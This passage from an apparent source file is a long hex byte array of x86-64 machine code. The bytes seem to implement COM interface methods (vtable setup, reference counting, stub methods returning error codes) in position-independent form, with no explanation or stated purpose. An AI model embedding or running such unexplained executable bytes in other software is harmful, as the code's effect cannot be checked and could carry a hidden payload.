798 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
799 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
800 0x18, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00,
801 0x48, 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b,
802 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x69, 0x01, 0x00, 0x00,
803 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
804 0x8d, 0x15, 0x91, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b,
805 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf3, 0x02, 0x00, 0x00,
806 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
807 0x8d, 0x15, 0xae, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b,
808 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x08, 0x03, 0x00, 0x00,
809 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
810 0x8d, 0x15, 0x09, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b,
811 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x0e, 0x03, 0x00, 0x00,
812 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
813 0x8d, 0x15, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b,
814 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xfc, 0x02, 0x00, 0x00,
815 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
816 0x8d, 0x15, 0xf9, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b,
817 0x45, 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
818 0xf8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x50, 0x90, 0x48, 0x83,
819 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
820 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
821 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20,
822 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75, 0x48, 0x8b,
823 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xfc, 0x03, 0x00,
824 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
825 0x89, 0xc2, 0xe8, 0x85, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48,
826 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xac, 0x04,
827 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00,
828 0x48, 0x89, 0xc2, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1b,
829 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0x48,
830 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
831 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
832 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x30, 0x5d,
833 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
834 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
835 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
836 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b,
837 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55,
838 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
839 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48,
840 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x55, 0xe8, 0xb8,
841 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f,
842 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x48, 0x83,
843 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
844 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
845 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
846 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x83,
847 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x70,
848 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48,
849 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x52, 0x28, 0x48,
850 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x50, 0x28,
851 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xe0,
852 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07,
853 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d, 0x48, 0x8b, 0x45, 0xf8, 0x48,
854 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48,
855 0x83, 0xc2, 0x18, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8,
856 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, 0xb8,
857 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48,
858 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
859 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa8,
860 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x48,
861 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
862 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x26, 0x11, 0x00, 0x00, 0x48, 0x8b,
863 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x55,
864 0xb0, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d,
865 0xfc, 0x00, 0x75, 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48,
866 0x8b, 0x40, 0x20, 0x4c, 0x8d, 0x4d, 0xa4, 0x4c, 0x8d, 0x45, 0xa8, 0x48,
867 0x8d, 0x55, 0xac, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc,
868 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55,
869 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48,
870 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48,
871 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x40, 0x78, 0xff,
872 0xd0, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x89, 0x10, 0xb8, 0x00, 0x00,
873 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
874 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00,
875 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
876 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x00, 0x00, 0x00, 0x00,
877 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
878 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
879 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55,
880 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00,
881 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89,
882 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
883 0x00, 0x48, 0x8d, 0x15, 0xb2, 0x02, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48,
884 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5d, 0x03, 0x00,
885 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
886 0x48, 0x8d, 0x15, 0x7d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
887 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa4, 0x03, 0x00,
888 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
889 0x48, 0x8d, 0x15, 0xbd, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48,
890 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x06, 0x04, 0x00,
891 0x00, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
892 0x48, 0x8d, 0x15, 0x37, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
893 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x99, 0x04, 0x00,
894 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
895 0x48, 0x8d, 0x15, 0x9a, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48,
896 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9b, 0x04, 0x00,
897 0x00, 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
898 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
899 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9d, 0x04, 0x00,
900 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
901 0x48, 0x8d, 0x15, 0x9e, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x60, 0x48,
902 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa1, 0x04, 0x00,
903 0x00, 0x48, 0x89, 0x50, 0x68, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
904 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
905 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00,
906 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
907 0x48, 0x8d, 0x15, 0xd5, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x80, 0x00,
908 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
909 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
910 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd1, 0x04, 0x00,
911 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
912 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xcf, 0x04, 0x00, 0x00, 0x48, 0x89,
913 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
914 0x48, 0x8d, 0x15, 0xcd, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00,
915 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
916 0xca, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48,
917 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd0, 0x04, 0x00,
918 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
919 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xce, 0x04, 0x00, 0x00, 0x48, 0x89,
920 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
921 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00,
922 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
923 0xd2, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48,
924 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00,
925 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
926 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xec, 0x04, 0x00, 0x00, 0x48, 0x89,
927 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
928 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00,
929 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
930 0xe8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48,
931 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
932 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b,
933 0x45, 0x10, 0x48, 0x8b, 0x80, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
934 0x18, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
935 0xdc, 0x03, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc,
936 0x00, 0x75, 0x32, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48,
937 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
938 0x42, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x8a, 0x8c, 0x04, 0x00,
939 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, 0x89, 0xca,
940 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x30,
941 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
942 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
943 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0x91,
944 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, 0x48,
945 0x8d, 0x88, 0xfc, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8,
946 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xd4, 0x0d, 0x00, 0x00,
947 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28,
948 0x48, 0x8d, 0x88, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41,
949 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xaf, 0x0d, 0x00,
950 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
951 0x28, 0x48, 0x8d, 0x88, 0x8c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
952 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x8a, 0x0d,
953 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b,
954 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10,
955 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8,
956 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48,
957 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b,
958 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
959 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48,
960 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
961 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
962 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf0,
963 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
964 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xfc,
965 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89,
966 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d,
967 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0f, 0x48,
968 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00,
969 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
970 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c,
971 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03,
972 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
973 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0x10,
974 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45,
975 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10,
976 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
977 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
978 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48,
979 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b,
980 0x40, 0x50, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x10, 0x4c, 0x8b,
981 0x4d, 0x38, 0x44, 0x8b, 0x45, 0x28, 0x48, 0x8b, 0x55, 0x20, 0xff, 0xd0,
982 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
983 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
984 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
985 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48,
986 0x8b, 0x40, 0x58, 0x44, 0x0f, 0xb7, 0x4d, 0xec, 0x48, 0x8b, 0x55, 0x10,
987 0x48, 0x8b, 0x4a, 0x10, 0x44, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x50,
988 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54,
989 0x24, 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48,
990 0x8b, 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x48, 0x8b, 0x55, 0x10,
991 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60,
992 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
993 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
994 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
995 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
996 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
997 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
998 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
999 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1000 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66,
1001 0x89, 0x45, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1002 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
1003 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00,
1004 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x18,
1005 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00,
1006 0xba, 0xfd, 0xff, 0xff, 0xff, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
1007 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1008 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1009 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1010 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1011 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1012 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1013 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1014 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1015 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1016 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1017 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8,
1018 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1019 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89,
1020 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1021 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1022 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1023 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1024 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1025 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1026 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
